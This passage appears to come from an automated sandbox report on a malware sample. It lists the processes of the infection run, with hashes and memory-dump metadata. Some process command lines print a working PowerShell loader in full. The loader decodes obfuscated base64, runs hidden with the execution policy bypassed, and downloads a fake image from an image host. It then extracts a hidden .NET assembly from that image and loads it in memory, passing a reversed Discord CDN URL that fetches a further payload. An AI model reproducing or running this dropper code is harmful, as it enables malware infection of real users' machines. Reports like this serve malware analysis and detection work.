reHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreMDgTreBmDgTreDDgTreDgTreMDgTreBjDgTreGQDgTreMgBhDgTreDMDgTreMDgTreDgTrexDgTreDkDgTreOQBjDgTreDcDgTreOQDgTre2DgTreDUDgTreMwDgTre0DgTreDMDgTreNgDgTre2DgTreDMDgTreZQBmDgTreGIDgTreODgTreDgTre4DgTreGUDgTreZgDgTre1DgTreGEDgTreNDgTreDgTre5DgTreDDgTreDgTreMQDgTre2DgTreDQDgTreMgBlDgTreDcDgTreZQBlDgTreDUDgTreZgDgTre5DgTreDcDgTreZDgTreDgTre1DgTreDgDgTreNDgTreDgTrewDgTreGUDgTreODgTreBhDgTreGEDgTreZDgTreDgTrexDgTreGUDgTreZQBhDgTreGYDgTreYQDgTre9DgTreG0DgTreaDgTreDgTremDgTreDDgTreDgTreZgBhDgTreGMDgTreMwDgTrezDgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreDDgTreDgTreNwBjDgTreDEDgTreNQDgTrezDgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrecwB3DgTreG8DgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreDYDgTreMwDgTrexDgTreDQDgTreNgDgTre3DgTreDkDgTreNgDgTre4DgTreDYDgTreMgDgTre2DgTreDEDgTreNDgTreDgTre2DgTreDUDgTreMwDgTreyDgTreDEDgTreLwDgTrezDgTreDQDgTreNgDgTrexDgTreDkDgTreMQDgTrexDgTreDEDgTreNQDgTrezDgTreDIDgTreMDgTreDgTre3DgTreDIDgTreNgDgTre1DgTreDMDgTreMgDgTrexDgTreC8DgTrecwB0DgTreG4DgTreZQBtDgTreGgDgTreYwBhDgTreHQDgTredDgTreBhDgTreC8DgTrebQBvDgTreGMDgTreLgBwDgTreHDgTreDgTreYQBkDgTreHIDgTrebwBjDgTreHMDgTreaQBkDgTreC4DgTrebgBkDgTreGMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreEEDgTreZDgTreBkDgTreEkDgTrebgBQDgTreHIDgTrebwBjDgTreGUDgTrecwBzDgTreDMDgTreMgDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                Imagebase:0x7ff63c0a0000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:7
                Start time:12:26:31
                Start date:23/05/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff704000000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:8
                Start time:12:26:34
                Start date:23/05/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
                Imagebase:0x7ff63c0a0000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Reset < >
                  Memory Dump Source
                  • Source File: 00000006.00000002.3049346458.00007FFE16880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16880000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ffe16880000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 37506c4a2d6d72408ac2a856b6c146d163bf9cf82242193b632eb88ba76e4576
                  • Instruction ID: 599c2790c96d6bdd58dcdeebdd38b2411a48307213668eb10c73e7067b73351b
                  • Opcode Fuzzy Hash: 37506c4a2d6d72408ac2a856b6c146d163bf9cf82242193b632eb88ba76e4576
                  • Instruction Fuzzy Hash: F001A77111CB0C8FD748EF0CE451AA6B3E0FB85324F10056DE58AC3261DB32E882CB45